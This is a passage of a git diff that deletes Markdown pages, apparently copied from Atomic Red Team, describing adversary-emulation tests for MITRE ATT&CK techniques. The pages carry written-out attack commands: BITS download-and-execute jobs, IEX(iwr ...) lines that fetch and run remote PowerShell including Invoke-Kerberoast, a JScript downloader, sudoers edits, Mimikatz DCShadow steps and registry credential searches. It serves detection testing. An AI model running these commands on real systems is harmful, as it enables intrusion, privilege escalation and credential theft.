-| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
-| local_file | Local file path to save downloaded file | path | %temp%&#92;bitsadmin_flag.ps1|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{local_file} >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Bitsadmin Download (PowerShell)
-This test simulates an adversary leveraging bitsadmin.exe to download
-and execute a payload leveraging PowerShell
-
-Upon execution you will find a github markdown file downloaded to the Temp directory
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
-| local_file | Local file path to save downloaded file | path | $env:TEMP&#92;bitsadmin_flag.ps1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{local_file} -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Persist, Download, & Execute
-This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
-and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bits_job_name | Name of BITS job | string | AtomicBITS|
-| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
-| local_file | Local file path to save downloaded file | path | %temp%&#92;bitsadmin_flag.ps1|
-| command_path | Path of command to execute | path | C:&#92;Windows&#92;system32&#92;notepad.exe|
-| command_line | Command line to execute | string | %temp%&#92;bitsadmin_flag.ps1|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-bitsadmin.exe /create #{bits_job_name}
-bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
-bitsadmin.exe /complete AtomicBITS
-bitsadmin.exe /resume #{bits_job_name}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1201.md b/Atomic_Threat_Coverage/Triggers/T1201.md
deleted file mode 100644
index 150197d..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1201.md
+++ /dev/null
@@ -1,227 +0,0 @@
-# T1201 - Password Policy Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1201)
-<blockquote>Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). An adversary may attempt to access detailed information about the password policy used within an enterprise network. This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
-
-Password policies can be set and discovered on Windows, Linux, and macOS systems. (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
-
-### Windows
-* <code>net accounts</code>
-* <code>net accounts /domain</code>
-
-### Linux
-* <code>chage -l <username></code>
-* <code>cat /etc/pam.d/common-password</code>
-
-### macOS
-* <code>pwpolicy getaccountpolicies</code></blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Examine password complexity policy - Ubuntu](#atomic-test-1---examine-password-complexity-policy---ubuntu)
-
-- [Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x](#atomic-test-2---examine-password-complexity-policy---centosrhel-7x)
-
-- [Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x](#atomic-test-3---examine-password-complexity-policy---centosrhel-6x)
-
-- [Atomic Test #4 - Examine password expiration policy - All Linux](#atomic-test-4---examine-password-expiration-policy---all-linux)
-
-- [Atomic Test #5 - Examine local password policy - Windows](#atomic-test-5---examine-local-password-policy---windows)
-
-- [Atomic Test #6 - Examine domain password policy - Windows](#atomic-test-6---examine-domain-password-policy---windows)
-
-- [Atomic Test #7 - Examine password policy - macOS](#atomic-test-7---examine-password-policy---macos)
-
-
-<br/>
-
-## Atomic Test #1 - Examine password complexity policy - Ubuntu
-Lists the password complexity policy to console on Ubuntu Linux.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-cat /etc/pam.d/common-password
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x
-Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-cat /etc/security/pwquality.conf
-```
-
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: System must be CentOS or RHEL v7
-##### Check Prereq Commands:
-```bash
-if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-echo Please run from CentOS or RHEL v7
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x
-Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-cat /etc/pam.d/system-auth
-cat /etc/security/pwquality.conf
-```
-
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: System must be CentOS or RHEL v6
-##### Check Prereq Commands:
-```bash
-if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-echo Please run from CentOS or RHEL v6
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Examine password expiration policy - All Linux
-Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-cat /etc/login.defs
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Examine local password policy - Windows
-Lists the local password policy to console on Windows.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net accounts
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Examine domain password policy - Windows
-Lists the domain password policy to console on Windows.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net accounts /domain
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Examine password policy - macOS
-Lists the password policy to console on macOS.
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-pwpolicy getaccountpolicies
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1202.md b/Atomic_Threat_Coverage/Triggers/T1202.md
deleted file mode 100644
index c8be8bf..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1202.md
+++ /dev/null
@@ -1,79 +0,0 @@
-# T1202 - Indirect Command Execution
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1202)
-<blockquote>Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Indirect Command Execution - pcalua.exe](#atomic-test-1---indirect-command-execution---pcaluaexe)
-
-- [Atomic Test #2 - Indirect Command Execution - forfiles.exe](#atomic-test-2---indirect-command-execution---forfilesexe)
-
-
-<br/>
-
-## Atomic Test #1 - Indirect Command Execution - pcalua.exe
-The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
-[Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
-Upon execution, calc.exe should open
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| process | Process to execute | string | calc.exe|
-| payload_path | Path to payload | path | C:&#92;Windows&#92;System32&#92;calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-pcalua.exe -a #{process}
-pcalua.exe -a #{payload_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Indirect Command Execution - forfiles.exe
-forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
-[Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)
-"This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
-Upon execution calc.exe will be opened
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| process | Process to execute | string | calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
-forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1204.md b/Atomic_Threat_Coverage/Triggers/T1204.md
deleted file mode 100644
index 5fb4b89..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1204.md
+++ /dev/null
@@ -1,213 +0,0 @@
-# T1204 - User Execution
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1204)
-<blockquote>An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via [Spearphishing Link](https://attack.mitre.org/techniques/T1192) that leads to exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. 
-
-As an example, an adversary may weaponize Windows Shortcut Files (.lnk) to bait a user into clicking to execute the malicious payload.(Citation: Proofpoint TA505 June 2018) A malicious .lnk file may contain [PowerShell](https://attack.mitre.org/techniques/T1086) commands. Payloads may be included into the .lnk file itself, or be downloaded from a remote server.(Citation: FireEye APT29 Nov 2018)(Citation: PWC Cloud Hopper Technical Annex April 2017) 
-
-While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - OSTap Style Macro Execution](#atomic-test-1---ostap-style-macro-execution)
-
-- [Atomic Test #2 - OSTap Payload Download](#atomic-test-2---ostap-payload-download)
-
-- [Atomic Test #3 - Maldoc choice flags command execution](#atomic-test-3---maldoc-choice-flags-command-execution)
-
-- [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
-
-
-<br/>
-
-## Atomic Test #1 - OSTap Style Macro Execution
-This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
-Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
-This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
-References:
-  https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
-| ms_product | Maldoc application Word or Excel | String | Word|
-| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
-```
-
-#### Cleanup Commands:
-```powershell
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
-##### Check Prereq Commands:
-```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - OSTap Payload Download
-Uses cscript //E:jscript to download a file
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| script_file | File to execute jscript code from | Path | %TEMP%&#92;OSTapGet.js|
-| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
-cscript //E:Jscript #{script_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{script_file} /F /Q >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Maldoc choice flags command execution
-This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
-Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
-| ms_product | Maldoc application Word or Excel | String | Word|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
-##### Check Prereq Commands:
-```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - OSTAP JS version
-Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
-Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
-| ms_product | Maldoc application Word or Excel | String | Word|
-| jse_path | jse file to execute with wscript | Path | C:&#92;Users&#92;Public&#92;art.jse|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
-```
-
-#### Cleanup Commands:
-```powershell
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
-##### Check Prereq Commands:
-```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1206.md b/Atomic_Threat_Coverage/Triggers/T1206.md
deleted file mode 100644
index 91bfd71..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1206.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# T1206 - Sudo Caching
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1206)
-<blockquote>The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code> that is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
-
-Adversaries can abuse poor configurations of this to escalate privileges without needing the user's password. <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user's password. When <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user. 
-
-The OSX Proton Malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</code>  (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Unlimited sudo cache timeout](#atomic-test-1---unlimited-sudo-cache-timeout)
-
-- [Atomic Test #2 - Disable tty_tickets for sudo caching](#atomic-test-2---disable-tty_tickets-for-sudo-caching)
-
-
-<br/>
-
-## Atomic Test #1 - Unlimited sudo cache timeout
-Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
-sudo visudo -c -f /etc/sudoers
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Disable tty_tickets for sudo caching
-Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
-sudo visudo -c -f /etc/sudoers
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1207.md b/Atomic_Threat_Coverage/Triggers/T1207.md
deleted file mode 100644
index 460dc07..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1207.md
+++ /dev/null
@@ -1,39 +0,0 @@
-# T1207 - DCShadow
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1207)
-<blockquote>DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
-
-Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
-
-This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - DCShadow - Mimikatz](#atomic-test-1---dcshadow---mimikatz)
-
-
-<br/>
-
-## Atomic Test #1 - DCShadow - Mimikatz
-Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
-
-[DCShadow](https://www.dcshadow.com/)
-[Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Run it with these steps! 
-1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
-2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
-3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
-4. lsadump::dcshadow /push
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1208.md b/Atomic_Threat_Coverage/Triggers/T1208.md
deleted file mode 100644
index fcaded5..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1208.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# T1208 - Kerberoasting
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1208)
-<blockquote>Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)
-
-Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
-
-This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)
-
-Cracked hashes may enable Persistence, Privilege Escalation, and  Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Request for service tickets](#atomic-test-1---request-for-service-tickets)
-
-
-<br/>
-
-## Atomic Test #1 - Request for service tickets
-This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
-
-The following are further sources and credits for this attack:
-[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
-[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
-when executed successfully , the test displays available services with their hashes. 
-If the testing domain doesn't have any service principal name configured, there is no output 
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
-Invoke-Kerberoast | fl
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1214.md b/Atomic_Threat_Coverage/Triggers/T1214.md
deleted file mode 100644
index 921b106..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1214.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# T1214 - Credentials in Registry
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1214)
-<blockquote>The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
-
-Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
-
-* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>
-* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code></blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Enumeration for Credentials in Registry](#atomic-test-1---enumeration-for-credentials-in-registry)
-
-- [Atomic Test #2 - Enumeration for PuTTY Credentials in Registry](#atomic-test-2---enumeration-for-putty-credentials-in-registry)
-
-
-<br/>
-
-## Atomic Test #1 - Enumeration for Credentials in Registry
-Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-reg query HKLM /f password /t REG_SZ /s
-reg query HKCU /f password /t REG_SZ /s
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Enumeration for PuTTY Credentials in Registry
-Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry
-entries are found, they will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1215.md b/Atomic_Threat_Coverage/Triggers/T1215.md
deleted file mode 100644
index 8708e82..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1215.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# T1215 - Kernel Modules and Extensions
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1215)
-<blockquote>Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)
-
-Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
-
-Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)</blockquote>
-
